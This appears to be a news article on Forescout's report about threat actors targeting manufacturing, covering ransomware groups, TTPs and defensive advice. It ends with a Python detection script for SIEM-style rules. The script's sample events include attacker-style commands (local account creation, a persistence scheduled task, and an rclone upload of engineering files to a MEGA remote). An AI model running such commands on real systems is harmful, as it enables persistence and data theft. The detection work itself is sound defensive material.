New research from Forescout Technologies disclosed that in 2024, there was a 71 percent increase in threat actors targeting the manufacturing sector. Between 2024 and the first quarter of 2025, there were 29 active threat actors in manufacturing; 79 percent of them were cybercriminals, and 45 percent were ransomware gangs. Of these, the most active was RansomHub with 78 victims, including large data thefts.

Forescout’s analysis of the manufacturing threat landscape in 2024 and the first quarter of 2025 revealed several significant trends. One of the most notable findings was an increase in attacker dwell time, indicating that threat actors are maintaining access within compromised environments for longer periods before detection. There was also a rise in the use of legitimate cloud services to facilitate data exfiltration, allowing attackers to blend in with normal network traffic and evade security controls.

Custom tools played a growing role in attacks. Examples include Black Basta’s BRUTED malware and RansomHub’s Betruger backdoor, both of which were used alongside living-off-the-land techniques to minimize detection. Additionally, the analysis found that hacktivist groups increasingly adopted ransomware tactics, while state-sponsored actors intensified their focus on operational technology within the manufacturing sector.

The latest research follows Forescout’s 2024 Threat Roundup, which ranked manufacturing as the fourth most targeted critical infrastructure sector. The ranking was driven by a 71 percent surge in active threat actors compared to the previous year. This sharp increase prompted a deeper investigation into the sector’s cyber risk profile.

The report examines the evolving threat landscape in manufacturing and offers a forward-looking assessment of emerging risks. As technologies like digital twins, industrial IoT, 5G, and AI (artificial intelligence) become more integrated into operations, they introduce new security challenges and widen existing detection gaps. To address these issues, the report outlines key strategies for reducing cyber risk across a highly interconnected and complex industrial environment.

The San Jose, California-headquartered vendor analyzed 17 cyber incidents to identify common tactics, techniques, and procedures used by threat actors. There was increased reliance on Initial Access Brokers, who sell access to compromised networks. Threat actors frequently exploit vulnerabilities in specific types of applications, including virtual private networks, remote access solutions, and file transfer applications.

Data exfiltration emerged as the most consistent and damaging impact. Stolen data included intellectual property, along with sensitive personal information such as Social Security numbers, bank account details, and passport scans belonging to employees and customers. Across the analyzed incidents, more than 3.3 terabytes of data were stolen. RansomHub was linked to the two largest exfiltration events, involving 2 terabytes and 487 gigabytes of stolen data, respectively.

The investigation highlighted several key trends in attacker behavior during the period. For initial access, threat actors increasingly relied on Initial Access Brokers and exploited vulnerabilities in widely used applications, including VPNs, remote access tools, and file transfer platforms.

In terms of persistence, execution, and command and control, there was a marked rise in the abuse of legitimate remote monitoring and management (RMM) tools. These tools were often used to launch commands through built-in functionality, such as shell access. Additional methods like user account creation, scheduled tasks, and web shells also remained common. While the use of Cobalt Strike has declined slightly for post-exploitation activities, it continues to appear in cases involving credential dumping and access token manipulation.

For defense evasion, a clear shift has occurred from traditional obfuscation techniques to the deployment of endpoint detection and response (EDR) bypass tools. KillAV, TrueSightKiller, and EDR Kill Shifter were among the tools used to disable endpoint telemetry. Techniques such as bring-your-own-vulnerable-driver (BYOVD) have become standard, replacing older methods like event log purging.

Threat actors have also adapted their discovery techniques. Many now favor Active Directory Service Interfaces (ADSI), as detection capabilities have improved against PowerShell-based reconnaissance tools. Finally, data exfiltration has become a routine step in most ransomware operations. Several groups showed a preference for specific tools, such as Rclone and MEGA, to facilitate data theft.

Legitimate remote monitoring and management tools were also used to maintain persistence and execute malicious activity within compromised environments. Additionally, there was a noticeable shift away from malware obfuscators in favor of tools designed to bypass endpoint detection and response systems. Finally, the use of custom malware was often combined with living-off-the-land techniques, where attackers leverage legitimate system tools to avoid detection and maintain a low profile.

Data revealed 121 threat actors with a history of targeting the manufacturing sector. Between 2024 and the first quarter of 2025, 29 of these actors were actively observed. The majority were cybercriminal groups, particularly those operating under the Ransomware-as-a-Service (RaaS) model.

RansomHub led the pack, claiming responsibility for attacks on 78 manufacturing organizations worldwide in 2024. The group was also behind several major data thefts within the sector. Other highly active RaaS groups included Akira, LockBit, Play, and Clop.

Despite high-profile law enforcement actions such as Operation Cronos, which targeted several major ransomware groups, many continued operating under the same name or through rebranded offshoots. Code reuse and affiliate crossover have contributed to a fragmented but persistent RaaS ecosystem, with some new groups emerging from defunct operations.

Several other groups showed some activity in manufacturing, although at lower levels. These include Fog, Medusa, Qilin, BlackSuit, 8Base, Hunters International, Black Basta, Snake/EKANS, INC Ransom, BianLian, Metaencryptor, Sarcoma, Space Bears, Everest, Ghost (Cring), Dragonforce, Frag, and Lynx.

Forescout noted that a consistent trend across these hackers is the deployment of multi-platform ransomware, now commonly used to target Windows, Linux, and ESXi environments.

Apart from cybercriminal groups, other types of actors also targeted the manufacturing sector. Hacktivist groups such as Handala, Kill Security, CyberVolk, and Cyber Army of Russia Reborn carried out ransomware attacks and disruptive operations against operational technology systems within manufacturing organizations. Their activities often reflected alignment with ongoing geopolitical conflicts.

State-sponsored threat groups were also active. APT28 and Volt Typhoon focused on targeting operational technology and industrial control system environments, including those connected to manufacturing. Another state-backed actor, Emperor Dragonfly, was observed deploying RA World ransomware following earlier espionage-related campaigns, suggesting a blending of strategic intelligence gathering with financially or operationally motivated attacks.

Researchers expect three trends to continue shaping the cyber threat landscape in the near term. The volume of attacks is projected to remain high, driven by the ongoing evolution and expansion of the Ransomware-as-a-Service (RaaS) ecosystem. As more threat actors gain access to turnkey ransomware kits and affiliate networks, the barrier to launching attacks continues to drop, sustaining a high frequency of incidents.

Targeting of OT (operational technology) assets is also expected to increase. As attackers become more familiar with the architecture and vulnerabilities of OT environments, these systems will become more frequent and deliberate targets, especially in industries where disruption can yield significant impact.

Geopolitical influence is anticipated to play a larger role in shaping attacker behavior. Both state-sponsored groups and hacktivist collectives are likely to adopt ransomware-style tactics not for financial gain, but to cause disruption. These politically motivated operations may increasingly focus on critical manufacturing sub-sectors tied to national infrastructure or strategic supply chains. 

Furthermore, as more organizations adopt cloud technologies, Forescout anticipates a rise in attacks that exploit cloud misconfigurations. Adding to these risks, the adoption of other emerging technologies within the sector is expected to introduce new and complex security challenges.

The researchers noted that manufacturing organizations need a proactive, adaptable security strategy to counter evolving threats. They must start with a full asset inventory, including risk levels and vulnerabilities, to guide patching, especially for exposed systems such as VPNs and RDP, and enforce strong passwords and multi-factor authentication. They must also improve visibility by enabling logging across assets and using SIEM and detection tools to catch living-off-the-land techniques and anomalies.

Additionally, manufacturers must segment IT and OT networks and monitor traffic at the boundary for suspicious activity, and reduce supply chain risk by setting security standards for vendors and monitoring for third-party breaches. They must also maintain immutable, offline backups and test recovery regularly to limit ransomware impact, and use targeted threat intelligence to build OT-specific threat models and response playbooks. Before deploying new technologies, they should assess risks, apply vendor security requirements, and monitor for novel attack vectors.
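As an added illustration (not code from the Forescout report), the following Python shows how a few of the behaviours named above, an RMM agent spawning a shell, local account creation, scheduled task creation, and Rclone uploads to cloud remotes such as MEGA, could be matched against process-creation events in a SIEM pipeline. The event records and the RMM agent binary name are constructed assumptions.

```python
import re

# Constructed Sysmon-style process-creation events (not from the Forescout report).
# Each dict mirrors the fields a SIEM would carry: parent image, child image, command line.
EVENTS = [
    {"parent": "explorer.exe", "image": "winword.exe", "cmd": "winword.exe Q1_report.docx"},
    {"parent": "rmmagent.exe", "image": "cmd.exe", "cmd": "cmd.exe /c whoami"},
    {"parent": "cmd.exe", "image": "net.exe", "cmd": "net user svc_backup Passw0rd! /add"},
    {"parent": "cmd.exe", "image": "schtasks.exe",
     "cmd": "schtasks /create /tn Updater /tr C:\\ProgramData\\u.exe /sc onlogon"},
    {"parent": "cmd.exe", "image": "rclone.exe", "cmd": "rclone copy D:\\Engineering mega:archive -P"},
    {"parent": "services.exe", "image": "svchost.exe", "cmd": "svchost.exe -k netsvcs"},
]

# Assumption: "rmmagent.exe" is a placeholder; populate this set with the RMM agents
# actually approved in your environment so that shells launched from them stand out.
RMM_IMAGES = {"rmmagent.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Cloud remotes rclone can be pointed at; the report singles out MEGA.
CLOUD_REMOTE = re.compile(r"\b(mega|s3|drive|b2|dropbox):", re.IGNORECASE)

RULES = [
    ("rmm_spawns_shell",
     lambda e: e["parent"].lower() in RMM_IMAGES and e["image"].lower() in SHELLS),
    ("local_account_created",  # net.exe hands off to net1.exe, so match both
     lambda e: e["image"].lower() in {"net.exe", "net1.exe"}
     and re.search(r"\buser\b.*/add\b", e["cmd"], re.IGNORECASE) is not None),
    ("scheduled_task_created",
     lambda e: e["image"].lower() == "schtasks.exe" and "/create" in e["cmd"].lower()),
    ("rclone_cloud_upload",
     lambda e: e["image"].lower() == "rclone.exe" and CLOUD_REMOTE.search(e["cmd"]) is not None),
]


def detect(events):
    """Return (rule_name, command_line) for every event that matches a rule."""
    hits = []
    for event in events:
        for name, predicate in RULES:
            if predicate(event):
                hits.append((name, event["cmd"]))
    return hits


if __name__ == "__main__":
    for name, cmd in detect(EVENTS):
        print(f"[{name}] {cmd}")
```

In production these predicates would be expressed as SIEM rules with allow-lists for scheduled backup jobs and sanctioned Rclone use, since the same commands are routine for administrators.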
